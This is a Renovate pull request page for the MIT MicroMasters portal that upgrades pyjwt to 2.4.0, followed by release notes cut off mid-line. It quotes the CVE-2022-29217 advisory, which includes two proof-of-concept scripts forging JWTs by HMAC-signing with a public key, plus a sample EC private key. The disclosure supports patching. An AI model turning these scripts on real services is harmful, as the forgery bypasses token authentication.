mitodl / micromasters

Portal for learners and course teams to access MITx Micromasters® programs
https://mm.mit.edu
BSD 3-Clause "New" or "Revised" License
28 stars 16 forks source link

chore(deps): update dependency pyjwt to v2 [security] #5360

Open renovate[bot] opened 8 months ago

renovate[bot] commented 8 months ago

Mend Renovate

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
pyjwt ==1.5.2 -> ==2.4.0 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2022-29217

Impact

What kind of vulnerability is it? Who is impacted?

Disclosed by Aapo Oksman (Senior Security Specialist, Nixu Corporation).

PyJWT supports multiple different JWT signing algorithms. With JWT, an attacker submitting the JWT token can choose the used signing algorithm.

The PyJWT library requires that the application chooses what algorithms are supported. The application can specify "jwt.algorithms.get_default_algorithms()" to get support for all algorithms. They can also specify a single one of them (which is the usual use case if calling jwt.decode directly. However, if calling jwt.decode in a helper function, all algorithms might be enabled.)

For example, if the user chooses "none" algorithm and the JWT checker supports that, there will be no signature checking. This is a common security issue with some JWT implementations.

PyJWT combats this by requiring that the if the "none" algorithm is used, the key has to be empty. As the key is given by the application running the checker, attacker cannot force "none" cipher to be used.

Similarly with HMAC (symmetric) algorithm, PyJWT checks that the key is not a public key meant for asymmetric algorithm i.e. HMAC cannot be used if the key begins with "ssh-rsa". If HMAC is used with a public key, the attacker can just use the publicly known public key to sign the token and the checker would use the same key to verify.

From PyJWT 2.0.0 onwards, PyJWT supports ed25519 asymmetric algorithm. With ed25519, PyJWT supports public keys that start with "ssh-", for example "ssh-ed25519".

import jwt
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import ed25519

# Generate ed25519 private key
private_key = ed25519.Ed25519PrivateKey.generate()

# Get private key bytes as they would be stored in a file
priv_key_bytes = 
private_key.private_bytes(encoding=serialization.Encoding.PEM,format=serialization.PrivateFormat.PKCS8, 
encryption_algorithm=serialization.NoEncryption())

# Get public key bytes as they would be stored in a file
pub_key_bytes = 
private_key.public_key().public_bytes(encoding=serialization.Encoding.OpenSSH,format=serialization.PublicFormat.OpenSSH)

# Making a good jwt token that should work by signing it with the 
private key
encoded_good = jwt.encode({"test": 1234}, priv_key_bytes, algorithm="EdDSA")

# Using HMAC with the public key to trick the receiver to think that the 
public key is a HMAC secret
encoded_bad = jwt.encode({"test": 1234}, pub_key_bytes, algorithm="HS256")

# Both of the jwt tokens are validated as valid
decoded_good = jwt.decode(encoded_good, pub_key_bytes, 
algorithms=jwt.algorithms.get_default_algorithms())
decoded_bad = jwt.decode(encoded_bad, pub_key_bytes, 
algorithms=jwt.algorithms.get_default_algorithms())

if decoded_good == decoded_bad:
     print("POC Successfull")

# Of course the receiver should specify ed25519 algorithm to be used if 
they specify ed25519 public key. However, if other algorithms are used, 
the POC does not work

# HMAC specifies illegal strings for the HMAC secret in jwt/algorithms.py
#

#        invalid_strings = [
#            b"-----BEGIN PUBLIC KEY-----",

#            b"-----BEGIN CERTIFICATE-----",
#            b"-----BEGIN RSA PUBLIC KEY-----",

#            b"ssh-rsa",
#        ]

#
# However, OKPAlgorithm (ed25519) accepts the following in 
jwt/algorithms.py:

#
#                if "-----BEGIN PUBLIC" in str_key:

#                    return load_pem_public_key(key)
#                if "-----BEGIN PRIVATE" in str_key:

#                    return load_pem_private_key(key, password=None)
#                if str_key[0:4] == "ssh-":

#                    return load_ssh_public_key(key)
#

# These should most likely made to match each other to prevent this behavior
import jwt

#openssl ecparam -genkey -name prime256v1 -noout -out ec256-key-priv.pem

#openssl ec -in ec256-key-priv.pem -pubout > ec256-key-pub.pem
#ssh-keygen -y -f ec256-key-priv.pem > ec256-key-ssh.pub

priv_key_bytes = b"""-----BEGIN EC PRIVATE KEY-----
MHcCAQEEIOWc7RbaNswMtNtc+n6WZDlUblMr2FBPo79fcGXsJlGQoAoGCCqGSM49
AwEHoUQDQgAElcy2RSSSgn2RA/xCGko79N+7FwoLZr3Z0ij/ENjow2XpUDwwKEKk
Ak3TDXC9U8nipMlGcY7sDpXp2XyhHEM+Rw==
-----END EC PRIVATE KEY-----"""

pub_key_bytes = b"""-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAElcy2RSSSgn2RA/xCGko79N+7FwoL
Zr3Z0ij/ENjow2XpUDwwKEKkAk3TDXC9U8nipMlGcY7sDpXp2XyhHEM+Rw==
-----END PUBLIC KEY-----"""

ssh_key_bytes = b"""ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJXMtkUkkoJ9kQP8QhpKO/TfuxcKC2a92dIo/xDY6MNl6VA8MChCpAJN0w1wvVPJ4qTJRnGO7A6V6dl8oRxDPkc="""

# Making a good jwt token that should work by signing it with the private key
encoded_good = jwt.encode({"test": 1234}, priv_key_bytes, algorithm="ES256")

# Using HMAC with the ssh public key to trick the receiver to think that the public key is a HMAC secret
encoded_bad = jwt.encode({"test": 1234}, ssh_key_bytes, algorithm="HS256")

# Both of the jwt tokens are validated as valid
decoded_good = jwt.decode(encoded_good, ssh_key_bytes, algorithms=jwt.algorithms.get_default_algorithms())
decoded_bad = jwt.decode(encoded_bad, ssh_key_bytes, algorithms=jwt.algorithms.get_default_algorithms())

if decoded_good == decoded_bad:
    print("POC Successfull")
else:
    print("POC Failed")

The issue is not that big as algorithms=jwt.algorithms.get_default_algorithms() has to be used. However, with quick googling, this seems to be used in some cases at least in some minor projects.

Patches

Users should upgrade to v2.4.0.

Workarounds

Always be explicit with the algorithms that are accepted and expected when decoding.

References

Are there any links users can visit to find out more?

For more information

If you have any questions or comments about this advisory:


Release Notes

jpadilla/pyjwt (pyjwt) ### [`v2.4.0`](https://togithub.com/jpadilla/pyjwt/blob/HEAD/CHANGELOG.rst#v250-httpsgithubcomjpadillapyjwtcompare240250) [Compare Source](https://togithub.com/jpadilla/pyjwt/compare/2.3.0...2.4.0) Changed ``` - Skip keys with incompatible alg when loading JWKSet by @​DaGuich in `#​762 `__ - Remove support for python3.6 by @​sirosen in `#​777 `__ - Emit a deprecation warning for unsupported kwargs by @​sirosen in `#​776 `__ - Remove redundant wheel dep from pyproject.toml by @​mgorny in `#​765 `__ - Do not fail when an unusable key occurs by @​DaGuich in `#​762 `__ - Update audience typing by @​JulianMaurin in `#​782 `__ - Improve PyJWKSet error accuracy by @​JulianMaurin in `#​786 `__ - Mypy as pre-commit check + api_jws typing by @​JulianMaurin in `#​787 `__ Fixed ~~~~~ - Adjust expected exceptions in option merging tests for PyPy3 by @​mgorny in `#​763 `__ - Fixes for pyright on strict mode by @​brandon-leapyear in `#​747 `__ - docs: fix simple typo, iinstance -> isinstance by @​timgates42 in `#​774 `__ - Fix typo: priot -> prior by @​jdufresne in `#​780 `__ - Fix for headers disorder issue by @​kadabusha in `#​721 `__ Added ~~~~~ - Add to_jwk static method to ECAlgorithm by @​leonsmith in `#​732 `__ - Expose get_algorithm_by_name as new method by @​sirosen in `#​773 `__ - Add type hints to jwt/help.py and add missing types dependency by @​kkirsche in `#​784 `__ - Add cacheing functionality for JWK set by @​wuhaoyujerry in `#​781 `__ ``` ### [`v2.3.0`](https://togithub.com/jpadilla/pyjwt/blob/HEAD/CHANGELOG.rst#v240-httpsgithubcomjpadillapyjwtcompare230240) [Compare Source](https://togithub.com/jpadilla/pyjwt/compare/2.2.0...2.3.0) Security ``` - [CVE-2022-29217] Prevent key confusion through non-blocklisted public key formats. https://github.com/jpadilla/pyjwt/security/advisories/GHSA-ffqj-6fqr-9h24 Changed ~~~~~~~ - Explicit check the key for ECAlgorithm by @​estin in https://github.com/jpadilla/pyjwt/pull/713 - Raise DeprecationWarning for jwt.decode(verify=...) by @​akx in https://github.com/jpadilla/pyjwt/pull/742 Fixed ~~~~~ - Don't use implicit optionals by @​rekyungmin in https://github.com/jpadilla/pyjwt/pull/705 - documentation fix: show correct scope for decode_complete() by @​sseering in https://github.com/jpadilla/pyjwt/pull/661 - fix: Update copyright information by @​kkirsche in https://github.com/jpadilla/pyjwt/pull/729 - Don't mutate options dictionary in .decode_complete() by @​akx in https://github.com/jpadilla/pyjwt/pull/743 Added ~~~~~ - Add support for Python 3.10 by @​hugovk in https://github.com/jpadilla/pyjwt/pull/699 - api_jwk: Add PyJWKSet.__getitem__ by @​woodruffw in https://github.com/jpadilla/pyjwt/pull/725 - Update usage.rst by @​guneybilen in https://github.com/jpadilla/pyjwt/pull/727 - Docs: mention performance reasons for reusing RSAPrivateKey when encoding by @​dmahr1 in https://github.com/jpadilla/pyjwt/pull/734 - Fixed typo in usage.rst by @​israelabraham in https://github.com/jpadilla/pyjwt/pull/738 - Add detached payload support for JWS encoding and decoding by @​fviard in https://github.com/jpadilla/pyjwt/pull/723 - Replace various string interpolations with f-strings by @​akx in https://github.com/jpadilla/pyjwt/pull/744 - Update CHANGELOG.rst by @​hipertracker in https://github.com/jpadilla/pyjwt/pull/751 ``` ### [`v2.2.0`](https://togithub.com/jpadilla/pyjwt/blob/HEAD/CHANGELOG.rst#v230-httpsgithubcomjpadillapyjwtcompare220230) [Compare Source](https://togithub.com/jpadilla/pyjwt/compare/2.1.0...2.2.0) Fixed ``` - Revert "Remove arbitrary kwargs." `#​701 `__ Added ``` - Add exception chaining `#​702 `\__ ### [`v2.1.0`](https://togithub.com/jpadilla/pyjwt/blob/HEAD/CHANGELOG.rst#v220-httpsgithubcomjpadillapyjwtcompare210220) [Compare Source](https://togithub.com/jpadilla/pyjwt/compare/2.0.1...2.1.0) Changed ``` - Remove arbitrary kwargs. `#​657 `__ - Use timezone package as Python 3.5+ is required. `#​694 `__ Fixed ~~~~~ - Assume JWK without the "use" claim is valid for signing as per RFC7517 `#​668 `__ - Prefer `headers["alg"]` to `algorithm` in `jwt.encode()`. `#​673 `__ - Fix aud validation to support {'aud': null} case. `#​670 `__ - Make `typ` optional in JWT to be compliant with RFC7519. `#​644 `__ - Remove upper bound on cryptography version. `#​693 `__ Added ~~~~~ - Add support for Ed448/EdDSA. `#​675 `__ ``` ### [`v2.0.1`](https://togithub.com/jpadilla/pyjwt/blob/HEAD/CHANGELOG.rst#v210-httpsgithubcomjpadillapyjwtcompare201210) [Compare Source](https://togithub.com/jpadilla/pyjwt/compare/2.0.0...2.0.1) Changed ``` - Allow claims validation without making JWT signature validation mandatory. `#​608 `__ Fixed ~~~~~ - Remove padding from JWK test data. `#​628 `__ - Make `kty` mandatory in JWK to be compliant with RFC7517. `#​624 `__ - Allow JWK without `alg` to be compliant with RFC7517. `#​624 `__ - Allow to verify with private key on ECAlgorithm, as well as on Ed25519Algorithm. `#​645 `__ Added ~~~~~ - Add caching by default to PyJWKClient `#​611 `__ - Add missing exceptions.InvalidKeyError to jwt module __init__ imports `#​620 `__ - Add support for ES256K algorithm `#​629 `__ - Add `from_jwk()` to Ed25519Algorithm `#​621 `__ - Add `to_jwk()` to Ed25519Algorithm `#​643 `__ - Export `PyJWK` and `PyJWKSet` `#​652 `__ ``` ### [`v2.0.0`](https://togithub.com/jpadilla/pyjwt/blob/HEAD/CHANGELOG.rst#v201-httpsgithubcomjpadillapyjwtcompare200201) [Compare Source](https://togithub.com/jpadilla/pyjwt/compare/1.7.1...2.0.0) Changed ``` - Rename CHANGELOG.md to CHANGELOG.rst and include in docs `#​597 `__ Fixed ~~~~~ - Fix `from_jwk()` for all algorithms `#​598 `__ Added ~~~~~ ``` ### [`v1.7.1`](https://togithub.com/jpadilla/pyjwt/blob/HEAD/CHANGELOG.rst#v200-httpsgithubcomjpadillapyjwtcompare171200) [Compare Source](https://togithub.com/jpadilla/pyjwt/compare/1.7.0...1.7.1) Changed ``` Drop support for Python 2 and Python 3.0-3.5 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Python 3.5 is EOL so we decide to drop its support. Version ``1.7.1`` is the last one supporting Python 3.0-3.5. Require cryptography >= 3 ^^^^^^^^^^^^^^^^^^^^^^^^^ Drop support for PyCrypto and ECDSA ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ We've kept this around for a long time, mostly for environments that didn't allow installing cryptography. Drop CLI ^^^^^^^^ Dropped the included cli entry point. Improve typings ^^^^^^^^^^^^^^^ We no longer need to use mypy Python 2 compatibility mode (comments) ``jwt.encode(...)`` return type ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Tokens are returned as string instead of a byte string Dropped deprecated errors ^^^^^^^^^^^^^^^^^^^^^^^^^ Removed ``ExpiredSignature``, ``InvalidAudience``, and ``InvalidIssuer``. Use ``ExpiredSignatureError``, ``InvalidAudienceError``, and ``InvalidIssuerError`` instead. Dropped deprecated ``verify_expiration`` param in ``jwt.decode(...)`` ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Use ``jwt.decode(encoded, key, algorithms=["HS256"], options={"verify_exp": False})`` instead. Dropped deprecated ``verify`` param in ``jwt.decode(...)`` ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Use ``jwt.decode(encoded, key, options={"verify_signature": False})`` instead. Require explicit ``algorithms`` in ``jwt.decode(...)`` by default ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Example: ``jwt.decode(encoded, key, algorithms=["HS256"])``. Dropped deprecated ``require_*`` options in ``jwt.decode(...)`` ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ For example, instead of ``jwt.decode(encoded, key, algorithms=["HS256"], options={"require_exp": True})``, use ``jwt.decode(encoded, key, algorithms=["HS256"], options={"require": ["exp"]})``. And the old v1.x syntax ``jwt.decode(token, verify=False)`` is now: ``jwt.decode(jwt=token, key='secret', algorithms=['HS256'], options={"verify_signature": False})`` Added ~~~~~ Introduce better experience for JWKs ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Introduce ``PyJWK``, ``PyJWKSet``, and ``PyJWKClient``. .. code:: python import jwt from jwt import PyJWKClient token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ik5FRTFRVVJCT1RNNE16STVSa0ZETlRZeE9UVTFNRGcyT0Rnd1EwVXpNVGsxUWpZeVJrUkZRdyJ9.eyJpc3MiOiJodHRwczovL2Rldi04N2V2eDlydS5hdXRoMC5jb20vIiwic3ViIjoiYVc0Q2NhNzl4UmVMV1V6MGFFMkg2a0QwTzNjWEJWdENAY2xpZW50cyIsImF1ZCI6Imh0dHBzOi8vZXhwZW5zZXMtYXBpIiwiaWF0IjoxNTcyMDA2OTU0LCJleHAiOjE1NzIwMDY5NjQsImF6cCI6ImFXNENjYTc5eFJlTFdVejBhRTJINmtEME8zY1hCVnRDIiwiZ3R5IjoiY2xpZW50LWNyZWRlbnRpYWxzIn0.PUxE7xn52aTCohGiWoSdMBZGiYAHwE5FYie0Y1qUT68IHSTXwXVd6hn02HTah6epvHHVKA2FqcFZ4GGv5VTHEvYpeggiiZMgbxFrmTEY0csL6VNkX1eaJGcuehwQCRBKRLL3zKmA5IKGy5GeUnIbpPHLHDxr-GXvgFzsdsyWlVQvPX2xjeaQ217r2PtxDeqjlf66UYl6oY6AqNS8DH3iryCvIfCcybRZkc_hdy-6ZMoKT6Piijvk_aXdm7-QQqKJFHLuEqrVSOuBqqiNfVrG27QzAPuPOxvfXTVLXL2jek5meH6n-VWgrBdoMFH93QEszEDowDAEhQPHVs0xj7SIzA" kid = "NEE1QURBOTM4MzI5RkFDNTYxOTU1MDg2ODgwQ0UzMTk1QjYyRkRFQw" url = "https://dev-87evx9ru.auth0.com/.well-known/jwks.json" jwks_client = PyJWKClient(url) signing_key = jwks_client.get_signing_key_from_jwt(token) data = jwt.decode( token, signing_key.key, algorithms=["RS256"], audience="https://expenses-api", options={"verify_exp": False}, ) print(data) Support for JWKs containing ECDSA keys ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Add support for Ed25519 / EdDSA ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Pull Requests ``` - Add PyPy3 to the test matrix ([#​550](https://togithub.com/jpadilla/pyjwt/issues/550)) by [@​jdufresne](https://togithub.com/jdufresne) - Require tweak ([#​280](https://togithub.com/jpadilla/pyjwt/issues/280)) by [@​psafont](https://togithub.com/psafont) - Decode return type is dict\[str, Any] ([#​393](https://togithub.com/jpadilla/pyjwt/issues/393)) by [@​jacopofar](https://togithub.com/jacopofar) - Fix linter error in test_cli ([#​414](https://togithub.com/jpadilla/pyjwt/issues/414)) by [@​jaraco](https://togithub.com/jaraco) - Run mypy with tox ([#​421](https://togithub.com/jpadilla/pyjwt/issues/421)) by [@​jpadilla](https://togithub.com/jpadilla) - Document (and prefer) pyjwt\[crypto] req format ([#​426](https://togithub.com/jpadilla/pyjwt/issues/426)) by [@​gthb](https://togithub.com/gthb) - Correct type for json_encoder argument ([#​438](https://togithub.com/jpadilla/pyjwt/issues/438)) by [@​jdufresne](https://togithub.com/jdufresne) - Prefer https:// links where available ([#​439](https://togithub.com/jpadilla/pyjwt/issues/439)) by [@​jdufresne](https://togithub.com/jdufresne) - Pass python_requires argument to setuptools ([#​440](https://togithub.com/jpadilla/pyjwt/issues/440)) by [@​jdufresne](https://togithub.com/jdufresne) - Rename \[wheel] section to \[bdist_wheel] as the former is legacy ([#​441](https://togithub.com/jpadilla/pyjwt/issues/441)) by [@​jdufresne](https://togithub.com/jdufresne) - Remove setup.py test command in favor of pytest and tox ([#​442](https://togithub.com/jpadilla/pyjwt/issues/442)) by [@​jdufresne](https://togithub.com/jdufresne) - Fix mypy errors ([#​449](https://togithub.com/jpadilla/pyjwt/issues/449)) by [@​jpadilla](https://togithub.com/jpadilla) - DX Tweaks ([#​450](https://togithub.com/jpadilla/pyjwt/issues/450)) by [@​jpadilla](https://togithub.com/jpadilla) - Add support of python 3.8 ([#​452](https://togithub.com/jpadilla/pyjwt/issues/452)) by [@​Djailla](https://togithub.com/Djailla) - Fix 406 ([#​454](https://togithub.com/jpadilla/pyjwt/issues/454)) by [@​justinbaur](https://togithub.com/justinbaur) - Add support for [`Ed25519`](https://togithub.com/jpadilla/pyjwt/commit/Ed25519) / EdDSA, with unit tests ([#​455](https://togithub.com/jpadilla/pyjwt/issues/455)) by [@​Someguy123](https://togithub.com/Someguy123) - Remove Python 2.7 compatibility ([#​457](https://togithub.com/jpadilla/pyjwt/issues/457)) by [@​Djailla](https://togithub.com/Djailla) - Fix simple typo: encododed -> encoded ([#​462](https://togithub.com/jpadilla/pyjwt/issues/462)) by [@​timgates42](https://togithub.com/timgates42) - Enhance tracebacks. ([#​477](https://togithub.com/jpadilla/pyjwt/issues/477)) by [@​JulienPalard](https://togithub.com/JulienPalard) - Simplify `python_requires` ([#​478](https://togithub.com/jpadilla/pyjwt/issues/478)) by [@​michael-k](https://togithub.com/michael-k) - Document top-level .encode and .decode to close [#​459](https://togithub.com/jpadilla/pyjwt/issues/459) ([#​482](https://togithub.com/jpadilla/pyjwt/issues/482)) by [@​dimaqq](https://togithub.com/dimaqq) - Improve documentation for audience usage ([#​484](https://togithub.com/jpadilla/pyjwt/issues/484)) by [@​CorreyL](https://togithub.com/CorreyL) - Correct README on how to run tests locally ([#​489](https://togithub.com/jpadilla/pyjwt/issues/489)) by [@​jdufresne](https://togithub.com/jdufresne) - Fix `tox -e lint` warnings and errors ([#​490](https://togithub.com/jpadilla/pyjwt/issues/490)) by [@​jdufresne](https://togithub.com/jdufresne) - Run pyupgrade across project to use modern Python 3 conventions ([#​491](https://togithub.com/jpadilla/pyjwt/issues/491)) by [@​jdufresne](https://togithub.com/jdufresne) - Add Python-3-only trove classifier and remove "universal" from wheel ([#​492](https://togithub.com/jpadilla/pyjwt/issues/492)) by [@​jdufresne](https://togithub.com/jdufresne) - Emit warnings about user code, not pyjwt code ([#​494](https://togithub.com/jpadilla/pyjwt/issues/494)) by [@​mgedmin](https://togithub.com/mgedmin) - Move setup information to declarative setup.cfg ([#​495](https://togithub.com/jpadilla/pyjwt/issues/495)) by [@​jdufresne](https://togithub.com/jdufresne) - CLI options for verifying audience and issuer ([#​496](https://togithub.com/jpadilla/pyjwt/issues/496)) by [@​GeoffRichards](https://togithub.com/GeoffRichards) - Specify the target Python version for mypy ([#​497](https://togithub.com/jpadilla/pyjwt/issues/497)) by [@​jdufresne](https://togithub.com/jdufresne) - Remove unnecessary compatibility shims for Python 2 ([#​498](https://togithub.com/jpadilla/pyjwt/issues/498)) by [@​jdufresne](https://togithub.com/jdufresne) - Setup GH Actions ([#​499](https://togithub.com/jpadilla/pyjwt/issues/499)) by [@​jpadilla](https://togithub.com/jpadilla) - Implementation of ECAlgorithm.from_jwk ([#​500](https://togithub.com/jpadilla/pyjwt/issues/500)) by [@​jpadilla](https://togithub.com/jpadilla) - Remove cli entry point ([#​501](https://togithub.com/jpadilla/pyjwt/issues/501)) by [@​jpadilla](https://togithub.com/jpadilla) - Expose InvalidKeyError on jwt module ([#​503](https://togithub.com/jpadilla/pyjwt/issues/503)) by [@​russellcardullo](https://togithub.com/russellcardullo) - Avoid loading token twice in pyjwt.decode ([#​506](https://togithub.com/jpadilla/pyjwt/issues/506)) by [@​CaselIT](https://togithub.com/CaselIT) - Default links to stable version of documentation ([#​508](https://togithub.com/jpadilla/pyjwt/issues/508)) by [@​salcedo](https://togithub.com/salcedo) - Update README.md badges ([#​510](https://togithub.com/jpadilla/pyjwt/issues/510)) by [@​jpadilla](https://togithub.com/jpadilla) - Introduce better experience for JWKs ([#​511](https://togithub.com/jpadilla/pyjwt/issues/511)) by [@​jpadilla](https://togithub.com/jpadilla) - Fix tox conditional extras ([#​512](https://togithub.com/jpadilla/pyjwt/issues/512)) by [@​jpadilla](https://togithub.com/jpadilla) - Return tokens as string not bytes ([#​513](https://togithub.com/jpadilla/pyjwt/issues/513)) by [@​jpadilla](https://togithub.com/jpadilla) - Drop support for legacy contrib algorithms ([#​514](https://togithub.com/jpadilla/pyjwt/issues/514)) by [@​jpadilla](https://togithub.com/jpadilla) - Drop deprecation warnings ([#​515](https://togithub.com/jpadilla/pyjwt/issues/515)) by [@​jpadilla](https://togithub.com/jpadilla) - Update Auth0 sponsorship link ([#​519](https://togithub.com/jpadilla/pyjwt/issues/519)) by [@​Sambego](https://togithub.com/Sambego) - Update return type for jwt.encode ([#​521](https://togithub.com/jpadilla/pyjwt/issues/521)) by [@​moomoolive](https://togithub.com/moomoolive) - Run tests against Python 3.9 and add trove classifier ([#​522](https://togithub.com/jpadilla/pyjwt/issues/522)) by [@​michael-k](https://togithub.com/michael-k) - Removed redundant `default_backend()` ([#​523](https://togithub.com/jpadilla/pyjwt/issues/523)) by [@​rohitkg98](https://togithub.com/rohitkg98) - Documents how to use private keys with passphrases ([#​525](https://togithub.com/jpadilla/pyjwt/issues/525)) by [@​rayluo](https://togithub.com/rayluo) - Update version to 2.0.0a1 ([#​528](https://togithub.com/jpadilla/pyjwt/issues/528)) by [@​jpadilla](https://togithub.com/jpadilla) - Fix usage example ([#​530](https://togithub.com/jpadilla/pyjwt/issues/530)) by [@​nijel](https://togithub.com/nijel) - add EdDSA to docs ([#​531](https://togithub.com/jpadilla/pyjwt/issues/531)) by [@​CircleOnCircles](https://togithub.com/CircleOnCircles) - Remove support for EOL Python 3.5 ([#​532](https://togithub.com/jpadilla/pyjwt/issues/532)) by [@​jdufresne](https://togithub.com/jdufresne) - Upgrade to isort 5 and adjust configurations ([#​533](https://togithub.com/jpadilla/pyjwt/issues/533)) by [@​jdufresne](https://togithub.com/jdufresne) - Remove unused argument "verify" from PyJWS.decode() ([#​534](https://togithub.com/jpadilla/pyjwt/issues/534)) by [@​jdufresne](https://togithub.com/jdufresne) - Update typing syntax and usage for Python 3.6+ ([#​535](https://togithub.com/jpadilla/pyjwt/issues/535)) by [@​jdufresne](https://togithub.com/jdufresne) - Run pyupgrade to simplify code and use Python 3.6 syntax ([#​536](https://togithub.com/jpadilla/pyjwt/issues/536)) by [@​jdufresne](https://togithub.com/jdufresne) - Drop unknown pytest config option: strict ([#​537](https://togithub.com/jpadilla/pyjwt/issues/537)) by [@​jdufresne](https://togithub.com/jdufresne) - Upgrade black version and usage ([#​538](https://togithub.com/jpadilla/pyjwt/issues/538)) by [@​jdufresne](https://togithub.com/jdufresne) - Remove "Command line" sections from docs ([#​539](https://togithub.com/jpadilla/pyjwt/issues/539)) by [@​jdufresne](https://togithub.com/jdufresne) - Use existing key_path() utility function throughout tests ([#​540](https://togithub.com/jpadilla/pyjwt/issues/540)) by [@​jdufresne](https://togithub.com/jdufresne) - Replace force_bytes()/force_unicode() in tests with literals ([#​541](https://togithub.com/jpadilla/pyjwt/issues/541)) by [@​jdufresne](https://togithub.com/jdufresne) - Remove unnecessary Unicode decoding before json.loads() ([#​542](https://togithub.com/jpadilla/pyjwt/issues/542)) by [@​jdufresne](https://togithub.com/jdufresne) - Remove unnecessary force_bytes() calls prior to base64url_decode() ([#​543](https://togithub.com/jpadilla/pyjwt/issues/543)) by [@​jdufresne](https://togithub.com/jdufresne) - Remove deprecated arguments from docs ([#​544](https://togithub.com/jpadilla/pyjwt/issues/544)) by [@​jdufresne](https://togithub.com/jdufresne) - Update code blocks in docs ([#​545](https://togithub.com/jpadilla/pyjwt/issues/545)) by [@​jdufresne](https://togithub.com/jdufresne) - Refactor jwt/jwks_client.py without requests dependency ([#​546](https://togithub.com/jpadilla/pyjwt/issues/546)) by [@​jdufresne](https://togithub.com/jdufresne) - Tighten bytes/str boundaries and remove unnecessary coercing ([#​547](https://togithub.com/jpadilla/pyjwt/issues/547)) by [@​jdufresne](https://togithub.com/jdufresne) - Replace codecs.open() with builtin open() ([#​548](https://togithub.com/jpadilla/pyjwt/issues/548)) by [@​jdufresne](https://togithub.com/jdufresne) - Replace int_from_bytes() with builtin int.from_bytes() ([#​549](https://togithub.com/jpadilla/pyjwt/issues/549)) by [@​jdufresne](https://togithub.com/jdufresne) - Enforce .encode() return type using mypy ([#​551](https://togithub.com/jpadilla/pyjwt/issues/551)) by [@​jdufresne](https://togithub.com/jdufresne) - Prefer direct indexing over options.get() ([#​552](https://togithub.com/jpadilla/pyjwt/issues/552)) by [@​jdufresne](https://togithub.com/jdufresne) - Cleanup "noqa" comments ([#​553](https://togithub.com/jpadilla/pyjwt/issues/553)) by [@​jdufresne](https://togithub.com/jdufresne) - Replace merge_dict() with builtin dict unpacking generalizations ([#​555](https://togithub.com/jpadilla/pyjwt/issues/555)) by [@​jdufresne](https://togithub.com/jdufresne) - Do not mutate the input payload in PyJWT.encode() ([#​557](https://togithub.com/jpadilla/pyjwt/issues/557)) by [@​jdufresne](https://togithub.com/jdufresne) - Use direct indexing in PyJWKClient.get_signing_key_from_jwt() ([#​558](https://togithub.com/jpadilla/pyjwt/issues/558)) by [@​jdufresne](https://togithub.com/jdufresne) - Split PyJWT/PyJWS classes to tighten type interfaces ([#​559](https://togithub.com/jpadilla/pyjwt/issues/559)) by [@​jdufresne](https://togithub.com/jdufresne) - Simplify mocked_response test utility function ([#​560](https://togithub.com/jpadilla/pyjwt/issues/560)) by [@​jdufresne](https://togithub.com/jdufresne) - Autoupdate pre-commit hooks and apply them ([#​561](https://togithub.com/jpadilla/pyjwt/issues/561)) by [@​jdufresne](https://togithub.com/jdufresne) - Remove unused argument "payload" from PyJWS.\ *verify*\ signature() ([#​562](https://togithub.com/jpadilla/pyjwt/issues/562)) by [@​jdufresne](https://togithub.com/jdufresne) - Add utility functions to assist test skipping ([#​563](https://togithub.com/jpadilla/pyjwt/issues/563)) by [@​jdufresne](https://togithub.com/jdufresne) - Type hint jwt.utils module ([#​564](https://togithub.com/jpadilla/pyjwt/issues/564)) by [@​jdufresne](https://togithub.com/jdufresne) - Prefer ModuleNotFoundError over ImportError ([#​565](https://togithub.com/jpadilla/pyjwt/issues/565)) by [@​jdufresne](https://togithub.com/jdufresne) - Fix tox "manifest" environment to pass ([#​566](https://togithub.com/jpadilla/pyjwt/issues/566)) by [@​jdufresne](https://togithub.com/jdufresne) - Fix tox "docs" environment to pass ([#​567](https://togithub.com/jpadilla/pyjwt/issues/567)) by [@​jdufresne](https://togithub.com/jdufresne) - Simplify black configuration to be closer to upstream defaults ([#​568](https://togithub.com/jpadilla/pyjwt/issues/568)) by [@​jdufresne](https://togithub.com/jdufresne) - Use generator expressions ([#​569](https://togithub.com/jpadilla/pyjwt/issues/569)) by [@​jdufresne](https://togithub.com/jdufresne) - Simplify from_base64url_uint() ([#​570](https://togithub.com/jpadilla/pyjwt/issues/570)) by [@​jdufresne](https://togithub.com/jdufresne) - Drop lint environment from GitHub actions in favor of pre-commit.ci ([#​571](https://togithub.com/jpadilla/pyjwt/issues/571)) by [@​jdufresne](https://togithub.com/jdufresne) - \[pre-commit.ci] pre-commit autoupdate ([#​572](https://togithub.com/jpadilla/pyjwt/issues/572)) - Simplify tox configuration ([#​573](https://togithub.com/jpadilla/pyjwt/issues/573)) by [@​jdufresne](https://togithub.com/jdufresne) - Combine identical test functions using pytest.mark.parametrize() ([#​574](https://togithub.com/jpadilla/pyjwt/issues/574)) by [@​jdufresne](https://togithub.com/jdufresne) - Complete type hinting of jwks_client.py ([#​578](https://togithub.com/jpadilla/pyjwt/issues/578)) by [@​jdufresne](https://togithub.com/jdufresne) ### [`v1.7.0`](https://togithub.com/jpadilla/pyjwt/blob/HEAD/CHANGELOG.rst#v171-httpsgithubcomjpadillapyjwtcompare170171) [Compare Source](https://togithub.com/jpadilla/pyjwt/compare/1.6.4...1.7.0) Fixed ``` - Update test dependencies with pinned ranges - Fix pytest 